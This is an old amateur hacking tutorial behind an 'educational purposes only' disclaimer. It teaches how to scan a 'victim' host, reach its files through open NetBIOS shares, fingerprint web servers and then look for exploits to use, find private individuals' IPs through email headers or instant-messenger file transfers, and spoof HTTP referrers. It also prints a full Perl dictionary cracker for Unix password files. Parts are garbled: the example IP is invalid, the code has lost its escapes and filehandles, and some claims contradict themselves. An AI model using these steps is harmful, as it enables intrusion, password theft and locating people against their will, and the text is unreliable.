############################################################################################################ 
DISCLAIMER: This paper is for educational purposes only, I take no responsibility for your actions. Any trouble you get into is your own fault. This may be used on websites but proper credit must be given. DO NOT use information found on this paper to hack anything, this information is only for the knowledge on how to secure your own servers. 
############################################################################################################ 
Part one: Exploits, Websites, IP's, Perl, and any other informative stuff by 7he gener@l 

1a) Retrieving information on a host 
1b) Using Exploits 
1c) Hacking websites 
1d) Finding peoples IP's 
1e) Creating perl scripts 
1f) Testing your own security 

1a) Retrieving information on a host. 

First of im going to show you all how to retrieve information from a host, please note that this is vital if you are going to hack anything at all. All computers, or networks, and webservers are hacked by gathering information and finding a security hole, the results of this can be many things such as getting passwords and other vital information, also giving you access to whatever you are hacking. Without this first step you most probably wont be able to hack the host. 

Ok, for an example of retrieving information we will look at the following. If you ever recieve spam (or any other email you'd wish to use) take a close look at the mail you recieve. I take a look at the headers (using outlook express as an example) ok this is what i see (the important part only) 

Received: from ahpsecu([193.256.172.60]) by mc12-f15.hotmail.com with Microsoft SMTPSVC(5.0.2195.6824); 

Ok now, i take a look at the number and notice that it is an IP (Internet Protocol for any noobs out there). So then I port scan the IP 

What is a port scanner you ask? Well it is basically (99%) of the time a program that trys to access all the ports and checks out what ports are open on a server (ports can also be known as doors). You can get a port scanner from http://www.tgs-security.com/. Now i scan the IP and i find that the following ports are open: 

21, 22, 80, 139, 8080 

port 21 is used for FTP (File Transfer Program), port 22 is SSH, port 80 is HTTP (Hyper Text Transfer Protocal), port 139 wich is NetBIOS ssn, and port 8080 is http proxy. Now just a note, port scanning is easily detected, and you could get kicked off your isp (internet service provided) if the sysop who checks the logs is a bit of a dick and reports it all. ( Although highly unlikely be sure to use your proxies i mentioned earlier). 

Now here is the interesting bit, NetBIOS is open, this allows us to access there Hard Drive remotely. So now i go into command promt (Start>Run>command) and a very unattractive black screen comes up (can you believe its an operating system from the 1980's?) When in command prompt i type in this command: "nbtstat -A 193.256.172.60" and this is what i get: 

Name Type Status 
Host <20> UNIQUE Registered 
Hostbug <00> GROUP Registered 
Host machine <03> UNIQUE Registered 
Do you see the type <20>? that is what we need, it means that file sharing is enabled on the server. 
Here (for future reference) is a list of other types that can be used: 
The values in the brackets (therefore under "Type") can be: 
00 base computernames and workgroups, also in "*" queries 
01 master browser, in magic __MSBROWSE__ cookie 
03 messaging/alerter service; name of logged-in user 
20 resource-sharing "server service" name 
1B domain master-browser name 
1C domain controller name 
1E domain/workgroup master browser election announcement 
Ok so what we know so far is that the host has port 139 open and that it allows file sharing. 
Now if i goto "Start>Search" and type in "Lmhosts.sam" a file should appear, open it with notepad (being sure NOT TO check the box "Always use this program to open this file type" or whatever it says) Once open you will see a bunch of instructions for what to do, you can read them if you want or you can go straight to the bottom and type in (as an example again) 

193.256.172.60 Host 

What this is, is just the IP and the share name (the word under "Name"). Close the file and goto "Start>Search>Computer" then type in the IP, if this is done correctly (as well as the entry in lmhosts.sam file), and file sharing is still enabled on the computer, you should get the computers IP show up, then you can most probably just go through the computer like its your own. 

Now I will use a handy little program called telnet. To access this goto "Start>Run>Telnet" Another black window should appear.Since we know the host has port 21 open we will telnet to that port by giving the command "o 193.256.172.60 21" All this command is "o" for open "193.256.172.60" is the IP you want to connect to and "21" is the port you want to connect to so in this case it is FTP (NOTE: "o" is for anyone who is running XP). I hit enter and i get this response: 

220 Serv-U FTP-Server v2.5k for WinSock ready... 

Serv-U is a Windows ftp server, and its also given away in "WinSock". 

So you ask "What do i do now?", Well if you want to hack this server (not the example i mean a real one). You could search for exploits on google.com for the server. Some easy basic needs to protect YOU (although i cant garantee 100% of the time you will be protected) are things such as: A firewall (I recommend BlackIce). You could also get a program that listen ins on open ports of your computer, so this also shows who is connected to that port and the program (if ones running on it) that is being used on the port. 

Some other information seeking programs are things like Tracert (type it in command prompt to show a better list of commands), and ping (again type it in command prompt to show a better list of commands, this should also be used before you look up information on the host to make sure it is alive). 

Another thing that is fairly important is to find out what server a website runs on. This isnt a real challenge as they usually give out that information by themselves, just by looking for a file that doesnt exist on the site. 

1b) Using exploits 

First off, what are exploits? Well basically they are a program that "exploits" a bug in a piece of software. There are many exploits all doing different things, and they all exploit different bugs, thats why different exploits must run on specific programs. There are all different types of exploits such as ones that get root on different OS's (operating systems), also there are types that will get an ID of a webserver, this is done when the the software thats bugs are being exploited is running as root. In Unix systems exploits crashes the software thats running as root, because in Unix systems software has to run as root because it cant run a task with another user. All you really need to do is find a compiler for the language that the exploit is written in and your in buisness. 

1c) Hacking Websites 

First off, we must find the server type and version, this way we may be able to find vulnerabilities. Open up command prompt and a black, ugly looking window should pop up. First we make sure that the victim you want hacked is alive, to do this, once we are in comand prompt we type: ping www.victim.com (changing victim.com to the domain you are hacking). By checking the reply times, we will know if the victim is alive or not. No that we know it is alive we port scan the victim i use Blues port scanner which can be found at http://www.tgs-security.com/. Once you have it, start it up and your in buisness, now type in the victims domain name in both of the boxes (in start, and end) and click scan. Once the scan is finished you should have a list of results, and as an example we would get this. 

TCP iphere 21 
TCP iphere 80 
TCP iphere 135 

Now i see that the victim has port 80 open, aswell as 21 (ftp) and 135 (netbios). 
So we now know that the victim is alive and has port 80 open, so what now? Well we are going to use a program called telnet. Im not going to go through the history of it, or go into detail on how to use it, but a tutorial can be found at tgs-security. So now start up command prompt again and and type: "telnet www.victim.com 80" and hit enter the screen should go blank. Now once this is dont, you can type in different pages you want to view, but for this example we want to find the server type, so to do this we try to get a file that is not even there, by typing: "Get ialed" and press enter twice and you should something like this: 

Date: Thu, 21 Mar 2004 20:46:52 GMT 
Server: Apache/1.3.26 (Unix) mod_perl/1.27 
Connection: Close 
Content-Type: text/html charset-iso-8859-1 
Plus alot of other junky source code crap. 

So now we know that the victim is alive (by using ping) 
Port 80 is open on the victim (we found this using a port scanner) 
We know what server the target is running (in this example its Apache/1.3.26 (Unix) mod_perl/1.27) 
We know that the target charset is iso-8859-1 

So now that we have found the versions what do we do? Well we search for vulnerabilities. When searching for vulnerabilities, you can do it manually or usea program (which is easier). You can find a recent list of vulnerabilities at http://www.tgs-security.com and http://www.securityfocus.com/.. 

So now we will do a vulnerability scan on the target. The tool im going to use for this example is Retina which can be found at http://www.eEye.com/, this is a 16 meg program that is worth the download. I will quickly run through it. The program is split up into four "sections" 

- Browser 
- Miner 
- Scanner 
- Tracer 

Ok now ill go through each part of the program in a bit of detail. 

-Browser, well take a guess this is quite simple its just a browser within the program. 
-Miner, This runs through about 20-30 thousand vulnerabilities, so your chances of finding one is fairly good 
-Scanner, This will scan a victim for vulnerabilities 
-Tracer, This is basically does a trace route to the victim. 

Ok so n ow here comes the good bit. Now go into scanner mode a in the address box, type in your victims address and press ok. It will then run a ping scan, trace scan, OS detection, port scan and vulnerability scan. Now after the scan is completed you might get a list of vulnerabilities, if you do there should be a marker next to them, they are in 3 colours green, orange and red. Green means it can give out some information, orange is a medium risk level and red is a high risk level. 

If you select an audit you can get more information on the vulnerability, also scroll down to find more information such as open ports and OS versions. From that you go off and find an exploit and use it, thats it for this section as im not going to go into full detail. 

1d) Finding peoples IP's 

Finding peoples IP's is alot easier then hacking someone (obviously). The first way as i mentioned earlier is through email, by looking at the headers, but may not be effective if the victim is using a encrypted proxy. 

Next one is by making a direct connection with the victim. This way can be used in an instant messanger program, ill be using msn. First open up command prompt and type: "netstat -n" this will give you a list of ports that are connected. Now send a file to a victim and make them accept. Once that is done and it is transfering type it in again in command prompt, then you should have an extra port open (it should be in the 6000's) from there work out which ip is your victims, there ya go. 

Another way which is way to obvious and is completely stupid (unlees the guys is a total dumbass) is using a program to get the IP but this usually shows th ip in there window as well as theres. You could also go to there computer and type in winipcfg in Start>Run or goto a site such as whatsmyip.com to get it, but this is once again to obvious. 

1e) Creating perl scripts 

Tainting - In perl scripts, if you have ever seen one the very first line is the path of the prgram, such as #!/usr/local/bin/perl -w 
The -w tells the program to give warnings if any errors are found in the code. So what is going to happen is we are going to have to disallow a user from using insecure commands, so the way its going to work is that the user cant execute a command, but any variable thats created in the script can. 

To enable Tainting add -T to the first line so it ends up like this #!/usr/local/bin/perl -Tw. You can untaint a variable by putting the data it contains a variable name $number, an example is $input = $1. The following script parses user input if it doesnt contain dangerous charaters, tells perl it is secure. 

if ($input =~ /^([-@w.]+)$/) { #If $input doesn't contain any of the characters 
$input = $1; # $data now untainted 
} else { 
die "Bad data in $input"; # log this somewhere } 

Strict - use strict; This command tells the script that from now on all sub's and variables MUST be declared before use. This will secure your script, but is alot harder to write. Give the command no strict; to disable it. 

Setuid - This a Unix command that allows the perl script to have rights above whoever is running it. To suid a script, log into the account through telnet and change the folder to the folder with the script, once done type the command "chmod u+s scriptname.pl" There are bugs in many Unix systems that will make a perl script crash when you try to run a suid script. To get around this, we use "C Wrappers", which a programs written in C that execute a perl script. Here is an example. 
#include 
void main () { 
execl("/usr/local/bin/perl","scriptname.pl","/local/web/cgi-bin/scriptname.pl",NULL); 
} 
Checking the user - Restrictions of webpages can be made by the IP of the computer (so meaking it for example only local users can access). In the Perl $HTTP_REFERRER is the page thats sent to the browser, and REMOTE_ADDR is the IP. Example: 
#!/usr/local/bin/perl 
$input= ; 
if($input eq "password") 
{ 
print "Correct password"; 
if($ENV{REMOTE_ADDR} eq "127.0.0.1") 
{ 
print "Correct IP"; } 
} 
What this script does is checks the password as input and the computer connecting has the IP 127.0.0.1. This is 100% effective because the referrer can be faked, so can the IP. Usually the perl script will require a IP the same as the server, so to fake the goto command prompt, type ping www.server.com get the ip. Now to fake the refferer goto command promtp again and telnet to the server where you want to download the file from. So type "telnet www.server.com 80" (substituting server.com for the real name). Using the get command get the file called /env_check.htm (so the command will be get /env_check.htm). Istead of hitting enter twice hit it once and type "Refferer: http://madeup.com/fake/refferer.html". Then hit enter. The IP is a bit harder to get, but by reading the script they can get the IP, so for this we will use the encryption finction. 
crypt() Function - This function is a built in encryption. Example is $try=crypt("pop", aa). What this does is encrypts the input using aa as the key. The result is then checked against the result of encrypting "pop" with aa. Here is a script, which was taken from Tyler Lu's Unix password cracker, as i thought it would be a good example. 
#!/usr/bin/perl 
if($#ARGV<1) 
{ 
print "nUsage: perlcrack passwd_file dictionary_filean"; 
exit; 
} 
##################### Filenames ######################### 
$passwd=$ARGV[0]; 
$dict=$ARGV[1]; 
################### Do subroutines ###################### 
dictionary(); 
passwords(); 
################## Dictionary Subroutine ################# 
sub dictionary 
{ 
open(DICT, $dict) or die ("nERROR: unable to open $dictan"); 
while() 
{ 
@_words=split; 
push @words, [@_words]; 
} 
print "ngot dictionary file: $dict"; 
close(DICT); print "n"; 
} 
################## Passwords Subroutine ################### 
sub passwords 
{ 
open(PASSWD, $passwd) or die ("nERROR: unable to open $passwdan"); 
print "got passwd file: $passwdn"; 
print "nbrute forcing...nn"; 
while() 
{ 
($user, $encrypt, $uid, $gid, $gecos, $home, $shell)=split(/:/); 
print "Encrypted password:-- "; 
print $encrypt; 
$crk="no"; 
crack(); # execute crack subroutine 
if($crk eq "no") 
{ 
$status="unable to crack"; 
$password="X"; 
write; 
} 
} 
close(PASSWD); 
print "n"; 

} 
##################### Crack Subroutine ################## 
sub crack 
{ 
for $pass(@words) 
{ 
$try=crypt(@$pass[0], aa); 
###print "nPassword trying:-- "; 
###print @$pass[0]; 
###print "nEncrypted:-- "; 
###print $try; 
###print "nn"; 
if($try eq $encrypt) { $status="FOUND"; 
$password=@$pass[0]; 
print"a"; 
write; 
$crk="yes"; 
last; 
} 
} 
} 
#################### Output Format ######################## 
format STDOUT = 
@<<<<<<<<<<<<<<<<< @<<<<<<<<<<<<<<<<< 
$status, $password 
. 
format STDOUT_TOP = 
status password 
++++++++++++++++++ ++++++++++++++++ 
. 
Now this is a big script, but basically the longer the password the longer it takes to crack. Thats it for this section. 

1f) Testing your own security 
Basically the easiest way to test your own security is to do a port scan to 127.0.0.1, all this does is loops back to you IP address. So when scanning you may find different ports open on your computer. When you see some open ports you can then figure out what ports they are, what risk there is of someone getting into your computer through them, and then close them. An easy way to close them is by getting a program called Aports (look for it in google) What this does is shows a list of oprts that are open and what is being used on it. If you think someone is connected to that port, or a trojan or something is connceted to that port (such as port 5000) Then you are able to terminate the process, which then closes the port. 
This has been another tutorial by 7he gener@